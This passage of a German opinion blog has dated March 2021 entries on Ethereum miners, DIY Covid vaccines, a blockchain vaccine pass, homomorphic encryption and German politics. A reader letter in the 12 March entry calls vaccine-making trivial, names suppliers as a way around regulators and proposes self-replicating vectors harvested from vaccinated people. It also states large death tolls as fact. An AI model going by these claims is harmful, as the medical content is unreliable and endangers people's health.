Stellt sich raus: Ethereum hatte sowas auch mehrfach. Sogar, je nach Perspektive, noch eine Runde krasser. Das angeblich superstabile, zuverlässige System ist wie bei Bitcoin verwundbar gegen ein Kartell aus Minern, wenn die zusammen über 50% der Mining-Leistung stellen. Was das verhindert, ist dass die Miner großzügig entlohnt werden und daher in Konkurrenz zueinander stehen. Bei Bitcoin funktioniert das schon nur so leidlich, aber bei Ethereum gab es einen Vorschlag, auf eine neue Art von Fundament umzusteigen, bei dem dann die Miner deutlich weniger Geld kriegen. Die Miner haben daraufhin besagtes Kartell zu bilden begonnen. Und was die Schlagzeile da jetzt sagt, ist dass der "Erfinder" dieses ganzen Schlamassels jetzt schnell-schnell mit Gewalt auf die neue Blockchain umzusteigen versucht.
Was man bei diesen ganzen Versionswechseln bei Cryptocurrencies im Auge behalten darf: Die haben euch die ganze Zeit ins Gesicht gelogen, dass ihre Infrastruktur sicher sei, dass ihre Kryptografie so sicher ist, dass es keine Fehler und Angriffe mehr gibt und man das jetzt für ewig fortschreiben kann. Deshalb ist es so sicher, dass ihr da bedenkenlos euer Geld reinpumpen könnt.
Aber gleichzeitig haben sie ihre Lügen selbst so wenig geglaubt, dass sie bei Ethereum Landminen eingebaut haben in den Algorithmus, der nach einer Weile einfach komplett zum Stillstand kommt. Die haben also von vorneherein das Gegenteil gemacht als sie euch ins Gesicht gelogen haben. Nix ist da stabil. Das war nicht mal als stabil geplant!
Oder, die andere Erklärung, falls euch die besser gefällt: Der "Erfinder" von Ethereum ist so unfassbar inkompetent, dass er nicht erkennt, dass sein exponentielles Wachstum im Miningaufwand eine eingebaute Zeitbombe ist.
Ich finde immer noch, dass Iota noch ein Iota (harr harr) unseriöser ist, aber Ethereum ist nicht weit entfernt.
Wenn mir jemand was mit Iota oder Ethereum verkaufen will, lache ich demjenigen jedenfalls heiser ins Gesicht.

Fri Mar 12 2021

[l] Viele meiner Medienkompetenzübungen funktionieren ja ganz gut, aber manchmal geht auch eine echt nach hinten los. Gestern hatte ich eine zu Covid-DIY-Impfungen.
Ich hatte da zwei Stories. Einmal eine zu einem Typen, der in seiner Garage eine Impfung gebaut und seinen Mitarbeitern verabreicht hat, ohne die dafür vorgeschriebenen Testreihen durchlaufen zu haben, und dafür eine Anzeige der zuständigen Behörde eingefahren hat, die genau dafür existiert, sowas zu verhindern. Sonst könnte ja jeder Krämer an der Straßenecke retrovirale Impfungen gegen Haarausfall verkloppen.
Ich habe zu dem extra zwei schöne Debunking-Links ins Blog getan, damit die Leute das lesen und sehen, wieso die Anzeige nicht nur berechtigt sondern gewollt war.
Es gibt da noch ein paar Details, die euch hätten auffallen können, als Teil der Übung. Erstens hättet ihr das mal googeln können und hättet dann dieses Statement von Petra Falb finden können, die bei der zuständigen Behörde Gutachterin für die Zulassung von Impfstoffen ist. Oder ihr hättet bemerken können, dass die Querdenker (die ja ansonsten eher impfkritisch sind) voll auf den stehen, vermutlich weil der Stöcker ein AfD-naher Klimakatastrophen-Leugner ist, der zum Sturz der Kanzlerin aufrief. Von DEM würden die evidenzbasierten Alternativmediziner einen germanischen Impfstoff nehmen, was ihre Fundamentalopposition zu anderen Impfstoffen gar lustig kontrakariert.
Aber egal. Eigentlich ging es mir ja nicht um die Rechten. Eigentlich ging es mir um die Linken. Diese Finnland-Meldung kam nämlich vom gegenüberliegenden Teil des Hufeisens (das gibt wieder böse Mails!1!!), von ein paar fundamentalmarxistischen Kapitalismusgegnern.
Meine eigentliche Hoffnung mit der Übung war, dass ihr die Argumente aus dem 1. Teil seht, und dann bei der Lektüre des 2. Teils merkt, dass die alle auch da passen. Dass, mit anderen Worten, Verschwörungstheorien unabhängig vom politischen Spektrum auf denselben Mustern aufbauen.
Oder, wenn ihr das nicht erkennt, hättet ihr wenigstens googeln können, dass der Oxford-Impfstoff schon im Januar 2020 fertig war, d.h. als dieser Impfstoff im Mai soweit war, war Oxford schon seit Monaten am Testen.
Stattdessen haben offenbar die meisten Leser den Eindruck gewonnen, dass ich hier den Stöcker feiern wollte. Nein. Wollte ich nicht. Im Gegenteil. Die Formulierungen haben das angedeutet, weil ich ja die Leute ansprechen wollte, die das glauben oder unentschlossen sind.
Tja. You win some, you lose some.
Übrigens gab es noch ein langen Leserbrief von jemandem, der eure Perspektive auf diese Impfstoffe möglicherweise radikal ändern wird:
In der Diskussion um den Stöcker (und jetzt auch noch diese Finnen!) kommt immer wieder von Experten (!) zum Ausdruck, dass man so ein komplexes Produkt ja gar nicht im Hobbykeller basteln kann. Das könnten nur Profis! Und schon gar nicht so ein Nazi-Opa in seiner Scheune (ja, für Ad-Hominem-Argumente ist der Stöcker sehr gut brauchbar).
Tatsächlich ist das Herstellen von einem rekombinanten Protein oder customized Adenovirus so einfach wie das Drucken eines hübschen Foto-Albums: Man braucht da nur im Internet einen Service anschreiben. Das hat der Stöcker sicher auch gemacht, und GENAU DESHALB kann er nicht sagen, was für eine Zell-Linie exakt das war.
Protein (chinesische Firma, kann man also bei Bedarf auch komplett an unseren Autoritäten vorbei bestellen): sinobiological.com
Adenovirus (hier dann mal eine US-Firma als Ansprechpartner): vectorbiolabs.com
Das sind nur die zwei ersten Fundstellen bei Google. Die, die dort Werbung bezahlt haben, dass man sie findet. Niemand, der sowas entwickelt, braucht dafür ein eigenes Labor! Die 10^12 Viren, die man da bekommt, reichen bei der Dosierung von AstraZeneca für 100 Impfungen, also genug für einen Phase-2-Test; wie viel Stoff man bei den Proteinen man so bekommt, habe ich jetzt nicht geguckt, wahrscheinlich auch so in der Größenordnung 100 Impfungen. Wenn man das richtig macht (also z.B. statt deaktivierte Replikation eine etwas abgeschwächte Replikation) kommt man vermutlich mit 10^6 Vektor-Viren pro Impfung hin, und kann sogar aus dem Rotz der geimpften weiteren Impfstoff gewinnen (so hat man übrigens die Pocken-Impfung repliziert: Die Pocken-Blasen an der Impfstelle enthalten genügend Kuhpocken-Viren für mehrere Impfungen). Dann könnte man mit einer Bestellung tatsächlich ganz Finnland durchimpfen und mit dem so entstandenen Rotz aus der Impfreaktion die ganze Welt.
Für die Antikörper-Tests braucht man auch keinen Drosten. Corona-Antikörpertest mit Titer kann jedes einigermaßen ausgestattete Labor, man muss die Probanden nur zum Hausarzt schicken. Mehr haben die kommerziellen Anbieter bei ihren Phase-2-Tests auch nicht gemacht.
Ich habe jetzt nicht gefragt, wie teuer der Spaß wäre (das geben die nicht direkt an, sondern “request a quote”), aber gehe davon aus, dass es sich um Budgets handelt, die kein Show-Stopper für ein Uni-Forschungsinstitut wären, denn das sind ja die üblichen Kunden. Entsprechend muss man sich nicht wundern, wenn Meldungen von Enthusiasten die Runde machen, die sich auf eigene Faust einen Impfstoff gebastelt haben. Ja, ne, die haben nur die DNA dafür auf dem Rechner zusammengeclickt, und das von so einem Service bauen lassen, mehr Aufwand ist das gar nicht mehr. Die Zellen, die die Vektor-Viren produzieren, haben das Adenoviren-Replikationsgen drin, und können deshalb auch ansonsten nicht vermehrungsfähige Adenoviren clonen. Serotyp und Payload kann man also frei wählen. Und bei rekombinanten Proteinen muss man eigentlich nur noch den Zelltyp anwählen (möglichst nah am Menschen).
Der Aufwand sind die Phase-3-Tests und der Aufbau der Massenproduktion. Nur, auch das Einkaufen und Betreiben von so Bioreaktoren und Aufreinigern ist kein Voodoo, sondern ebenfalls ein ganz normales bestellbares Produkt.
Der Hauptgrund der Aufregung scheint mir zu sein, dass so Hobbyisten-Free-Pharma-Produkte eine Industrie erschüttern würden wie einst GNU und Linux das mit der Software gemacht haben.
Nur, wenn man sich die Entwicklungszeiten anguckt, ist es um mehrere Größenordnungen einfacher, so einen Impfstoff zu *entwickeln* als irgendwelche freie Software. Irgendwo zwischen echo und cat oder so.
Und lasst euch nicht von „Unethisch!“ ablenken. Die Pharma-Industrie war bereit, 30 Millionen Afrikaner sterben zu lassen, nur um die Profite für die AIDS-Medikamente hoch zu halten. Denn nachdem der Patentschutz dort endlich aufgehoben wurde, waren die Medikamente als Generica für fast 2 Größenordnungen billiger zu haben, und DANN wollten auch die Krankenkassen von reichen westlichen Staaten plötzlich diese Wucherpreise nicht mehr bezahlen.
Es gibt im ganzen 20. Jahrhundert nur ganz wenige menschengemachte Katastrophen, die ähnlich viele Opfer gefordert haben wie die Pharma-Patente nur auf die drei AIDS-Medikamente. Russlandfeldzug. Großer Sprung nach Vorn. So, die Größenordnung.
Und die Verzögerung der Corona-Impfung durch die explizit als Marktzugangshemmnis aufgerichteten Impf-Regularien (die übrigens in pandemischen Situationen in vielen Ländern gekippt werden könnten, aber außer Russland und China hat das keiner gemacht) haben auch schon 2 Millionen Menschenleben gefordert.
Impfstoff-Entwicklung ist vor allem deshalb in der Regel schwierig, weil die verbliebenen Pathogene von Interesse böse Tricks auf Lager haben, die einen daran hindern, einfache etablierte Techniken zu nutzen, oder weil die Fälle so selten sind, dass man Jahrzehnte warten muss, bis die Kontrollgruppe endlich ihre 100+ Fälle durch hat. Das alles ist bei Covid-19 nicht der Fall: Die Impfstoffentwicklung ist trivial, das Virus hat keine bösen Tricks auf Lager, und die Kontrollgruppe durchseucht sich ziemlich schnell.
Update: Hier ist ein Blogeintrag von einem Ami, der das mal gemacht hat. Mit diesem interessanten Absatz:
(Side note: in many ways immunity in the mucus lining is better than in the blood, since it blocks infection at the point where it’s introduced. This is an advantage of inhaled vaccines over injected. So why do most commercial vaccines inject? Turns out logistics are a major constraint on commercial vaccine design, and injections are surprisingly easier logistically.
Also doch nicht "weil wir ein Patent auf Spritzkram hatten" :-)
Ein bisschen später gab es dann noch ein Blogpost, wie er das jetzt testen will aber noch ohne Resultate. Die stehen noch aus.

Thu Mar 11 2021

[l] So langsam ist es mal an der Zeit für Bashing, findet ihr nicht?
So von Kapitalismus und Big Pharma?
Story 1: Lübecker Tüftler baut Covid-Impfstoff, Wirkung unabhängig bestätigt, und er will das Zeug verschenken.
In dem Glas mit dem Erdbeerdeckel befindet sich eine Ampulle mit einem blauen Verschluss. »Da ist das Antigen drin«, sagt Stöcker. »Damit könnte man innerhalb eines halben Jahres drei Viertel der Bevölkerung Deutschlands gegen Corona immunisieren.«
Was passiert? Strafanzeige gegen ihn.
Original kam die Story hinter Paywall beim ehemaligen Nachrichtenmagazin, daher hier keinen Link von mir. Dieser Link hier geht zur Gegenstory beim SWR, die argumentieren, dass die Strafanzeige gerechtfertigt war. Hier ist der BR dazu, die ähnlich argumentieren wie der SWR.
Story 2: Finnische Forscher hatten angeblich schon im Mai 2020 einen wirksamen Impfstoff, den man sogar per Nasenspray verabreichen konnte. Die Sache wurde aber nie in Richtung Zulassung vorangetrieben, weil man damit kein Geld hätte verdienen können.
Saksela und sein Team hatten bereits im Mai 2020 einen patentfreien Covid-19-Impfstoff entwickelt, den sie in Anspielung auf das berühmte finnische Open-Source-Betriebssystem als »das Linux unter den Impfstoffen« bezeichneten. [...]
»Es ist ein fertiges Produkt, in dem Sinne, dass sich die Rezeptur bei weiteren Tests nicht mehr verändern wird«, sagt Saksela. »Mit dem, was wir haben, könnten wir morgen die gesamte Bevölkerung Finnlands impfen.«
Das bemerkenswerte an diesem Artikel ist aber nicht dieser Teil der Story, sondern das hier (finde ich zumindest):
»Die Hintergrundrecherche war an einem Nachmittag getan, und die gab dann allen die Richtung vor«, sagt Saksela. »Auf Grundlage der bisherigen Forschung zu SARS-1 und MERS, lag eigentlich alles auf der Hand – das war kein großer Triumph der Wissenschaft.« Anstatt einen inaktivierten oder geschwächten Keim in den menschlichen Körper einzuschleusen, trainieren die neuen Coronavirus-Impfungen unser Immunsystem, auf ein – an sich harmloses – »Spike-Protein« zu reagieren, das die charakteristischen Ausstülpungen auf der Virusoberfläche bildet.
Ja wie, warte mal, war das nicht gerade die große Innovation bei Biontech und Moderna? Das war gar nicht neu?!
Das Wissen über diesen Mechanismus ist älter als alle Beiträge von Pharmaunternehmen.
Nein, war es nicht. Ja, äh, aber was war denn dann der neue Beitrag von denen?
»Verschiedene Biotech-Unternehmen packten das Spike-Protein auf irgendeine Art von Übertragungsmechanismus, sei es RNA-Technologie oder etwas anderes«, erklärt Saksela. »Dabei basiert die Wahl in der Regel darauf, auf welche Anwendungen die jeweiligen Unternehmen ein Patent haben – ob das nun die beste Option ist oder nicht.«
Die eigentliche Innovation der Pharma-Unternehmen ist die Profitmaximierung.
Mit diesen künstlich (und in meinen Augen unredlich) herbeigeführten Profiten finanzieren die dann die langjährigen Zulassungsvoraussetzungen für die nächste Runde an Patent-Pharma. Das ist ein selbsterhaltendes Monopolerzeugungssystem.

Wed Mar 10 2021

[l] Ein Leser weist darauf hin, dass diese Iota-Firma hier schon mal im Blog war. Da steht der Name der Firma nicht dran, und die Primärquelle ist inzwischen depubliziert worden. Aber der Name des Chefs steht da noch: Stephan Noller. In der Tat, das ist auch der Name des Gründers von Ubirch. Der hat einen Wikipedia-Eintrag. Ratet mal, was der vorher gemacht hat. Kommt ihr NIE drauf!
Nach seiner Tätigkeit bei TNS Emnid, wo er für den Aufbau eines Verfahrens zur Messung von Internet-Reichweiten für den Branchenverband AGOF verantwortlich war, das 2006 mit dem Preis der deutschen Marktforschung ausgezeichnet wurde[1], entwickelte er 2005/2006 bei TNS Infratest ein Targeting-System für Onlinewerbung auf der Basis eines automatisierten Profilings, das u. a. bei United Internet Media, dem Konzern zu dem u. a. die Portale gmx.de und web.de gehören, unter dem Namen TGP zum Einsatz kam.
Op-ti-male Wahl für ein Projekt im Gesundheitswesen.
Neben den industriellen Aspekten beteiligt sich Noller auch an der sog. Post-Privacy-Debatte und beschäftigt sich mit der Frage, inwiefern das klassische Modell des Datenschutzes überhaupt noch auf heutige Nutzungs-Szenarien im Internet und bei Big-Data Szenarien angewendet werden kann.[7]
Ja genau. Privatsphäre ist eh tot. Kommt in unsere Blockchain!
Überdies beschäftigt sich die ubirch GmbH mit der apparativen Messung von Emotionen, die mithilfe von Verfahren des maschinellen Lernens ausgewertet werden.
Wait, what!?

Tue Mar 9 2021

[l] Das Bundesgesundheitsministerium will einen digitalen Impfpass haben, und IBM soll ihn bauen.
Gute Wahl. IBM hat langjährige Erfahrung damit, der deutschen Regierung die internen Abläufe mit Hollerith-, äh, ich meine, Blockchain-Technologie zu optimieren!!1!
Außerdem, wenn es eine Firma gibt, bei der man nichts, äh, ich meine nur Gutes von deren IT-Projekten hört, dann ist es ja wohl IBM!
Da wächst zusammen, was zusammengehört. Eine Regierung, die technologisch aus den 1980ern ist, kauft bei einem Zulieferer, dessen letzte Erfolge in den 1980ern liegen. Damals hieß es unter Einkäufern: Niemand ist jemals gefeuert worden, weil er IBM gekauft hat.
Ich hoffe, dass das diesmal anders läuft. Viel Hoffnung habe ich aber nicht. Dafür müssten Spahn und Scheuer ja öffentlich zugeben, dass der Auffahrunfall hinter ihnen, den alle klar sehen können, tatsächlich existiert. Wahrscheinlicher ist, dass die wieder Gaslighting betreiben, das alles ok ist, und was es an kleineren Problemchen gibt halt nicht vermeidbar gewesen wäre.
Update: Während bei der Tagesschau steht, das eine beteiligte Unternehmen sei auf "Datensicherheit mithilfe der Blockchain-Technologie spezialisiert", klingt das beim ehemaligen Nachrichtenmagazin so:
Der Kölner Anbieter Ubirch setzt auf QR-Codes und Blockchain-Verifizierung. Mit an Bord: IT-Riese IBM.
Alter Falter, und ich mach noch Blockchain-Witzchen! Auf der anderen Seite: Was sonst wäre von einer Kompetenzkanone wie Spahn zu erwarten gewesen?
Update: Hier ist die Selbstdarstellung von Ubirch:
UBIRCH denkt IoT-Sicherheit neu und geht dabei einen revolutionären Weg: auf Basis etablierter und robuster Kryptografie- und Blockchain-Technologie. [...] Funktioniert übrigens auch weltweit als erste Blockchain-on-a-SIM-Lösung.
Wie weit darf Satire gehen?
Update: Aus dem Spiegel-Artikel:
Technisch funktioniert das Ubirch-System so: Jede geimpfte Person bekommt im Impfzentrum oder beim Hausarzt einen QR-Code – auf einer Plastikkarte oder einem Stück Papier, per Mail oder App. Der QR-Code ist ein anonymer Fingerabdruck, der aus personenbezogenen Daten wie dem Namen sowie den Angaben zum Impfdatum und dem verwendeten Impfstoff generiert wird. Er wird kryptografisch signiert und in insgesamt fünf Blockchains hinterlegt.
Da stellen sich direkt einige Fragen. Wenn der Fingerabdruck aus personenbezogenen Daten generiert wird, wieso ist er dann anonym? Wenn er anonym ist, wie hilft er dann beim impfen? Wenn er anonym ist, aber wieder mit einer Identität verknüpft wird, damit man erkennen kann, ob jemand geimpft ist, welchen Wert hat dann die Anonymisierung und wieso wird sie überhaupt gemacht? Wer signiert hier kryptografisch? Und wieso wird der in fünf Blockchains hinterlegt? Eine wäre nicht sicher genug? Wieso nicht sieben? Wieso nicht 23?
Wenn man der Erklärung bei Ubirch hinterherklickt, findet man:
Entscheidend ist, dass nur die geimpfte Person über diesen QR-Code verfügt und nur sie entscheidet, wem sie ihn später zum Zwecke der Verifikation vorzeigt.
Wofür brauchen wir dann die Blockchains?
Es gibt keinen zentralen Speicherort.
Bis auf die fünf Blockchains, oder zählen die nicht, weil die "dezentral" sind?
Bei Bedarf kann durch den Digitalen Impfnachweis jederzeit gegenüber Dritten nachgewiesen werden, dass der Impfstatus unverfälscht ist. Dazu muss lediglich der QR-Code gescannt werden und die Angaben zur Person mit einem gültigen Identitätsnachweis z. B. dem Personalausweis abgeglichen werden.
Wie watt? Ist das Impfzeug jetzt personengebunden oder nicht? Wie soll man denn sehen können, dass ich da nicht den QR-Code meines Nachbarn vorzeige, wenn der angeblich anonym ist?
OK, ich stell mir das so vor: Die machen einen Hash über die Impfdaten und Name+Anschrift und signieren den. Zum Verifizieren scannst du den QR-Code, da holt er die Impfdaten raus und macht einen Hash darüber und über Name+Anschrift aus dem vorgezeigten Personalausweis. Das klingt erstmal gut, aber was wenn jemand den Namen ändert oder umzieht? Muss derjenige sich dann auch nen neuen QR-Code holen?
Update: So besiegen wir die Pandemie! Das Virus lacht sich tot!
Update: Übrigens, zur Sicherheit explizit: Ein Hash über personenbezogene Daten ist nicht anonym sondern pseudonym. Das ist ein Unterschied, auch juristisch im Kontext der DSGVO.
[l] Na geil. Da hab ich ja drauf gewartet. Intel baut jetzt Hardware für Homomorphe Verschlüsselung.
Homomorphe Verschlüsselung ist ein Treppenwitz der Informatik. Ich rege mich da seit Jahren drüber auf. Das ist ein Taschenspielertrick, um den Cloud-Vertrieblern zu ermöglichen, den Leuten ins Gesicht zu lügen, man könne seine Datenbank in die Cloud schieben, ohne dem Cloud-Anbieter vertrauen zu müssen.
Ich will das daher mal kurz erklären.
Die Idee ist, dass man die Daten mit absichtlich kaputtgemachten Verfahren "verschlüsselt".
Wieso sage ich kaputtgemacht? Weil die Daten in "verschlüsselter" Form noch vergleichbar sein sollen. Je nachdem welche Verarbeitung man noch machen können will, desto kaputter wird die Verschlüsselung.
Nehmen wir mal an, ich schicke dir und deinem Nachbarn eine verschlüsselte Mail, und in beiden steht der gleiche Text. Dann ist der Ciphertext (die verschlüsselte Version) selbstverständlich unterschiedlich! Das leuchet hoffentlich direkt intuitiv ein, wieso das so gemacht wird. "Das ist derselbe Text, den er auch dem Nachbarn geschickt hat" ist ja Teil des Inhalts, den wir geheimhalten wollen! Weswegen wir überhaupt Verschlüsselung verwenden!
Bei homomorpher Verschlüsselung in der stärksten Version (bei der man nur Gleichheit testen können will) ist diese Eigenschaft aufgehoben. Wenn zum Beispiel zwei Leute das gleiche Geburtsdatum haben, dann kommt in der Datenbank auch das gleiche "verschlüsselte" Geburtsdatum raus. Das ist keine Schwäche sondern gerade das Ziel und Versprechen von homomorpher Verschlüsselung, dass man damit Datenbankoperationen machen kann. Die schwächste Anforderung, die man an Datenbankoperationen haben kann, ist dass man noch auf Gleichheit testen will.
Weitere Stufen, die die "Verschlüsselung" noch heftiger schwächen, wären Kleiner/Größer-Vergleiche. Das wäre für viele Webseiten die Mindestanforderung, weil die ja anhand des Datums gucken können wollen, ob derjenige über 18 ist.
In der Forschung geht es noch weiter, da gibt es auch Modelle, bei denen noch Addition und Subtraktion gehen soll auf den "verschlüsselten" Daten.
Aber Fefe, fragt ihr jetzt, was ist denn daran so schlimm?
Na stellen wir uns doch mal gemeinsam einen Angreifer vor. Der Angreifer hat die Datenbank erfolgreich angegriffen. Wir haben die Datenbank homomorph verschlüsselt, damit er mit den Daten nichts anfangen kann.
Erstes Problem: Der Angreifer will deinen Datensatz finden. Lösung: Dann loggt er sich bei der Datenbank mit deinem Usernamen ein und guckt, welchen Datensatz in der Datenbank der Webserver haben will. Damit hat er deinen "verschlüsselten" Usernamen und den Datensatz.
Problem 2: Als nächstes will der Angreifer deine Kreditkartennummer entschlüsseln. Wie macht er das? Er macht einen anderen Account auf, und trägt dann da eine Kreditkartennummer ein. Wenn die homomorphe Verschlüsselung noch Gleichheit testen erlauben will, dann kann der Angreifer einfach bei seinem Testaccount Kreditkartennummer durchprobieren. Der Webserver verschlüsselt die Nummer homomorph und trägt die in die Datenbank ein. Dort kann der Angreifer die verschlüsselte Version seiner Test-Nummer sehen. Wenn die verschlüsselte Nummer übereinstimmt, hat der Angreifer deine Kreditkartennummer erfolgreich geraten.
Bei allen diskreten Datensatztypen funktioniert dieser Durchprobieransatz. Ist aber möglicherweise nicht sehr effizient. Wenn die Datenbank Vergleiche auf kleiner und größer erlaubt mit ihrer homomorphen Verschlüsselung, ist das Durchprobieren eine Sache von Sekunden, weil man sich per Binärsuche annähern kann anstatt zufällig herumzustochern.
Ja aber Fefe, dass jemand sowohl die Datenbank kopiert und live beobachten kann, welche Anfragen reinkommen, das ist doch ein total unrealistisches Bedrohungsmodell!1!!
Ist es? Ich dachte homomorphe Verschlüsselung sollte dafür sorgen, dass ich die Datenbank in der Cloud haben kann, und nicht dem Cloudprovider vertrauen muss?
Der Cloudprovider kann die Datenbank abgreifen und die Anfragen sehen. Das ist genau das Bedrohungsszenario, für das dieser Scheiß angeblich gedacht war.
Kurz gesagt: Wenn euch jemand homomorphe Verschlüsselung andrehen will, lacht ihn aus. Am besten ins Gesicht. Öffentlich.
Und ich kann nur sagen: Intel setzt ihre Reihe von Innovationen, die sich als Sicherheitslücken herausstellen, auch unter Pat Gelsinger fort.
Schade.
Genau wie Intel Konkurrenz von AMD brauchte, braucht AMD Konkurrenz von Intel. Nicht dass Intel sich jetzt so ins Abseits schießt, dass AMD am Ende das neue Intel wird.
Oh und eine andere Sache, die an dieser Stelle hoffentlich intuitiv klar ist: Wenn der Webserver vor der Datenbank auch in der Cloud ist, dann bringt homomorphe Verschlüsselung überhaupt nichts.
Update: OK ich muss da vielleicht stärker differenzieren. Was homomorphe Verschlüsselung laut wissenschaftlicher Literatur ist, ist Berechnungen auf verschlüsselten Daten, also Addition und Multiplikation. Was homomorphe Verschlüsselung im Marketing ist, ist was ich oben beschreibe.
Wenn man sich komplett darauf zurückzieht, was die Wissenschaft beschreibt, ist es nicht ganz so kontraproduktiv wie ich oben beschreibe. Allerdings lässt es sich dann auch nicht für "du kannst deine Datenbank verschlüsselt in die Cloud tun" nutzen, denn du kannst ja nur Berechnungen durchführen, nicht einen Index auf das Feld haben, denn um im Index einer Datenbank etwas nachzuschlagen, musst du gleich und/oder kleiner-größer Vergleiche haben. Und, Spoiler: Der Index ist, was die Datenbank zur Datenbank macht. Kurz gesagt: Das ist eine Lösung, die noch nach ihrem Problem sucht.
Die Erkenntnis, dass das Frontend dann nicht in der Cloud sein darf, die gilt ja immer noch. Und findet mal das Frontend, das im Moment nicht in der Cloud läuft. Das ist ja gerade der Teil, den du weltweit verteilen willst, wegen der Skalierbarkeit.
Und die Berechnung muss glaube ich noch erfunden werden, die so teuer ist, dass sie teurer ist als die Daten homomorph zu verschlüsseln.
Und, wenn man genau hinguckt: Wieso würde man denn Berechnungen verschlüsselt in der Cloud durchführen wollen, wenn die Datenbank mit den Daten woanders ist? Was ist hier das Business Model? Dass du deine Datenbank unter Tisch stehen hast, aber die Daten darin einmal verschlüsselt in die Cloud exportierst, damit die eine bestimmte Liste von Operationen darauf durchführen können, dir andere verschlüsselte Daten zurückgeben, und die entschlüsselst du dann und tust sie wieder in die Datenbank?
I call bullshit.
Außer ... ja, außer die Berechnung auf den Daten ist "geheim". Das könnte hier das Endgame sein. Das es nicht darum geht, wo deine Daten lagern, sondern dass dir der Laden, der die Berechnungen macht, nicht verraten will, was sie da eigentlich genau berechnen. Sozusagen Algorithm as a service. Wo es nicht darum geht, ob du dem Anbieter vertraust, sondern dass der Anbieter dir nicht genug vertraut, um dir den Code zu geben, damit du ihn auf deinen Daten ausführen kannst.
Für diese krasse Umkehrung des Computing ist die Welt hoffentlich nicht blöde genug.

Sun Mar 7 2021

[l] Die Bafin ist nun nicht gerade als hart durchgreifender Regulierer bekannt, eher im Gegenteil. Wenn man im Lexikon unter Regulatory Capture nachguckt, steht da "Siehe: Bafin".
Insofern lässt es umso mehr aufhorchen, wenn die Bafin eine Bank schließt.
Und in der Tat: Lest euch das mal durch.
Was die da unter "gängiges Geschäftsmodell" jahrelang betrieben haben, da krieg ich Ausschlag, wenn ich das lese.
Ganz old and busted: Schulden aufkaufen, dann eintreiben.
Bisschen weniger old and busted: Factoring (Zulieferer nimmt lieber jetzt 90% der Rechnung als sich monatelang mit dem Schuldner-Konzern herumzustreiten, Dienstleister übernimmt den Titel und treibt den dann vom Konzern langwierig ein).
New hotness: Reverse Factoring. Das ist, was diese Bank betrieben hat. Ein Konzern schuldet einem Zulieferer einen Haufen Geld, die Bank zahlt den aus, minus einen Abschlag, und der Konzern bezahlt dann irgendwann später die Bank. D.h. beauftragt vom säumigen Schuldner.
Liest sich für mich so, als ob der Zulieferer gar nicht gefragt wird, ob er auf den Abschlag verzichten will, von dem dieser Reverse Factoring-Dienstleister seinen Profit macht.
So und jetzt der Grund, warum die Bafin den Laden zugemacht hat: Weil die einem säumigen Konzern gehörten. Der hat dreist aus "ich bezahl meine Zulieferer nicht pünktlich" ein fucking Geschäftsmodell für eine Tochterfirma gemacht!
Hat nicht geholfen, der musste wohl gerade Insolvenz anmelden, und jetzt denkt sich die Bafin: Warte mal, dann ist diese Tochter ja wohl auch so gut wie tot...?
D.h. mit dem Geschäftsmodell vorher hatte die Bafin kein Problem. Solange der Konzern nicht pleite war.
Wenn ich sowas lese, frage ich mich immer, wieso die Politik eigentlich erwartet, dass die kleinen Leute Steuern zahlen. Das ist doch kein Wunder, dass sich die Leute fragen, wieso sie eigentlich der einzige ehrliche Mensch im Land sein sollen.

Sat Mar 6 2021

[l] Spahn ist sauer.
Die erwarten doch jetzt ernsthaft von ihm, dem Bundesgesundheitsminister, dass er sich um ... Gesundheitsfragen kümmert!
Hey so war das aber nicht abgemacht! Das sollte ein ruhiger Posten auf dem Abstellgleis sein, wo man nicht viel kaputt machen kann!
Wo sich ein profilloser Parteisoldat in Ruhe seine Pensionsansprüche er"arbeiten" kann!!1!
Und jetzt DAS!!
Es geht damit los, dass die Supermärkte gerne helfen würden. Sie machten folgendes Angebot:
Die Konzernchefs hätten angeboten, ihre Logistikzentren zur Verfügung zu stellen und die Verteilung zu übernehmen – der Bund müsse die Tests nur zentral beschaffen.
Super, denkt ihr euch jetzt vielleicht! Alles geklärt! Der schwierige Teil der Sache ist vom Tisch! Das Problem klärt sich von selbst! Kapitalismus, fuck yeah!
Da habt ihr eure Rechnung aber ohne Spahn gemacht:
Das sah der Gesundheitsminister aber anders: "Ich verstehe ehrlicherweise überhaupt nicht, warum ich mich als Bundesgesundheitsminister mit der Frage beschäftigen muss", zitiert die Zeitung aus dem Protokoll. Die Testbeschaffung sei schließlich Ländersache. "Ich weiß nicht, warum wir denen immer die Dinge regeln sollen, weil die Länder es irgendwie nicht hinkriegen."
Das weiß doch jeder, dass Krankheiten an den Grenzen zwischen den Bundesländern stehenbleiben!!1! Eine bundesweite Koordination ist daher völlig abwegig!1!!
Im Übrigen: Wo kommen wir da hin, wenn der Spahn für sein Geld auch mal was leisten muss?
Was ich ja besonders hart finde: Muss er ja nicht mal. Kann er komplett wegdelegieren. Aber sogar dafür ist der zu faul!

Tue Mar 2 2021

[l] Manchmal lohnt es sich, eine Sache aus einer anderen Perspektive zu betrachten. Hier ist eine Covid-Perspektive, die einen häufig genannten Punkt so formuliert, dass er m.E. deutlich überzeugender wird:
Der Staat darf Bürger in einer Pandemie einschränken, um die Volksgesundheit nicht zu gefährden. Was er nicht darf, ist Teile der Bevölkerung hierfür zu schädigen. Das, was im Moment gemacht wird, ist eine Triage auf einer anderen Ebene. Wir retten Leben auf Kosten derjenigen, die nicht ins Krankenhaus gekommen sind, keine Operation hatten, einen Herzinfarkt erleiden. Auf Kosten derjenigen, deren Krebserkrankungen nicht erkannt werden, auf Kosten von misshandelten Kindern und derjenigen, die Suizid begehen.
Das Argument ist alt, aber das als andere Art von Triage zu betrachten, das ist glaube ich neu. Habe ich zumindest noch nicht gesehen. (Danke, Heiko)

Mon Mar 1 2021

[l] Wenn ihr mal in irgendwelchen Onlineforen Leuten begegnet seid, die an Videospielen arbeiten, dann wird euch aufgefallen sein, dass die häufig auffallend überzeugt von ihrer eigenen Befähigung sind.
Sie halten ihre Probleme für die schwierigsten, ihre Lösungen für die schlauesten, ihren Code für den zeitkritischsten und ihre Algorithmen für die besten.
Ich habe das noch nie verstehen können, aber das mag an meinem Spielegeschmack liegen. Wer mit Mass Effect 3 und Bethesda-Spielen großgeworden ist, der findet die Idee eher abwegig, dass Spieleentwickler besonders fähig sind. Das stürzt alles ab, wenn du kurz blinzelst. Wenn du kurz durch eine Tür in ein Zelt gehst und dann wieder raus, dann hast du ne Minute Wartezeit, weil er die ganze Welt neu lädt, etc.
